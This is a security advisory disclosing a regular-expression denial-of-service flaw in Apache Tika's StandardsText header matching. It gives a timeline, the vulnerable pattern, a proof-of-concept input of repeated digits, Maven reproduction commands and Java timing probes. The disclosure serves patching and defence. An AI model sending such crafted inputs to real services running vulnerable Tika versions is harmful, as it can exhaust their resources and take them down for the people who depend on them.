Coordinated Disclosure Timeline
- 2022-04-07: Report sent to security@apache.org
- 2022-04-12: Issue is acknowledged
- 2022-05-02: 1.28.2 and 2.4.0 with a fix were released
- 2022-05-03: An email about the release was sent to Security Lab, but it was missed
- 2022-05-16: CVE-2022-30126 was assigned
- 2022-05-31: Bypass to the fix was sent to the Tika team
- 2022-06-16: 1.28.4 with a fix was released
- 2022-06-17: 2.4.1 with a fix was released
- 2022-06-27: CVE-2022-33879 was assigned
Summary
Apache Tika up to version 1.28.1 is vulnerable to Regular Expression Denial of Service (ReDoS) in the way it handles standard references in text files. Specially crafted files may cause catastrophic backtracking, taking exponential time to complete.
Product
Apache Tika
Tested Version
Details
Issue: Regular Expression Denial of Service (ReDoS) in StandardsText.java (GHSL-2022-021)
Apache Tika uses the following regular expression to match uppercase standard headers when extracting standard references from a text file using StandardsText:
private static final String REGEX_HEADER =
"(\\d+\\.(\\d+\\.?)*)\\p{Blank}+([A-Z]+(\\s[A-Z]+)*){5,}";
Note the nested repetition in (\\d+\\.?)*. Because \\.? is optional, a long run of digits can be consumed either by the inner \\d+ or by further iterations of the outer *. When no full match follows the digits, the regex engine backtracks through an exponential number of these alternatives [1] before it can report failure.
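To make the growth concrete, the following sketch counts how many ways a run of n digits can be divided among iterations of (\\d+\\.?)* when the optional dot is never used. The class and method names are hypothetical, and the count illustrates the size of the search space rather than the exact number of steps any particular regex engine performs.

```java
final class BacktrackingCount {
    // Counts the ways to cut a run of n digits into consecutive non-empty
    // chunks, where each chunk is one iteration of (\d+\.?) with the
    // optional dot left unused. Hypothetical helper for illustration only.
    static long countSplits(int n) {
        long[] ways = new long[n + 1];
        ways[0] = 1; // nothing left to split: exactly one way
        for (int len = 1; len <= n; len++) {
            // The first chunk takes `first` digits; the rest is split recursively.
            for (int first = 1; first <= len; first++) {
                ways[len] += ways[len - first];
            }
        }
        return ways[n];
    }

    public static void main(String[] args) {
        for (int n : new int[] {1, 5, 10, 20, 30}) {
            System.out.println(n + " digits: " + countSplits(n) + " possible splits");
        }
    }
}
```

Each extra digit doubles the count (2^(n-1) splits for n digits), which is why a few additional characters in the payload are enough to move from a quick failure to an effectively unbounded one.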
This regex is used in StandardsText.findHeaders, which in turn is called in StandardsText.extractStandardReferences. The latter is used by the StandardsExtractingContentHandler class, which means that a text file parsed with this handler and containing a specific payload can trigger the ReDoS vulnerability.
To demonstrate the exploitation, the provided StandardsExtractionExample can be used as follows:
$ cat /tmp/test/test.txt
2.9999999999999999999999999999999
$ cd tika-examples
$ mvn compile exec:java -Dexec.mainClass="org.apache.tika.example.StandardsExtractionExample" -Dexec.args="/tmp/test"
The time needed to parse the file grows exponentially with the length of the sequence of 9s in the input file test.txt.
Note that JDK 9 introduced important mitigations for this problem, so in order to reproduce the issue with the above example, it must be run with JDK 8 or earlier.
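The behaviour can also be observed without building Tika. The sketch below is a standalone probe, not Tika code: it copies the pattern text from this advisory, assumes it is applied with Matcher.find(), and times it against payloads of increasing length. The class name, helper names, and the sample header "1.2 INTRODUCTION" are hypothetical. Timings depend on the JDK and the machine, so none are listed here.

```java
import java.util.regex.Pattern;

final class HeaderRegexProbe {
    // Pattern text copied from the advisory; applying it with find() is an assumption.
    static final Pattern HEADER = Pattern.compile(
            "(\\d+\\.(\\d+\\.?)*)\\p{Blank}+([A-Z]+(\\s[A-Z]+)*){5,}");

    // Builds "2." followed by the requested number of '9' characters,
    // mirroring the shape of the test.txt payload (hypothetical helper).
    static String payload(int nines) {
        StringBuilder sb = new StringBuilder("2.");
        for (int i = 0; i < nines; i++) {
            sb.append('9');
        }
        return sb.toString();
    }

    // Returns true if the header pattern matches anywhere in the text.
    static boolean findsHeader(String text) {
        return HEADER.matcher(text).find();
    }

    public static void main(String[] args) {
        // A numbered, uppercase header is expected to match.
        System.out.println("header matches: " + findsHeader("1.2 INTRODUCTION"));

        // The payload never matches; only the time taken to fail changes.
        for (int n = 10; n <= 20; n += 2) {
            long start = System.nanoTime();
            boolean found = findsHeader(payload(n));
            long millis = (System.nanoTime() - start) / 1_000_000;
            System.out.println(n + " nines: found=" + found + ", " + millis + " ms");
        }
    }
}
```

The upper bound of the loop is kept small on purpose. On JDK 8 or earlier, raise it gradually, since the time to fail is expected to roughly double with each added digit.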
Impact
This issue may lead to a denial of service by resource consumption.
Resources
[1] https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS
[2] https://github.com/google/re2j
CVE
- CVE-2022-30126
- CVE-2022-33879
Credit
This issue was discovered and reported by the CodeQL team members @atorralba (Tony Torralba) and @joefarebrother (Joseph Farebrother).
The incomplete fix was discovered and reported by @atorralba (Tony Torralba) of the CodeQL team and @jarlob (Jaroslav Lobačevski) of GitHub Security Lab.
Contact
You can contact the GHSL team at securitylab@github.com. Please include a reference to GHSL-2022-021 in any communication regarding this issue.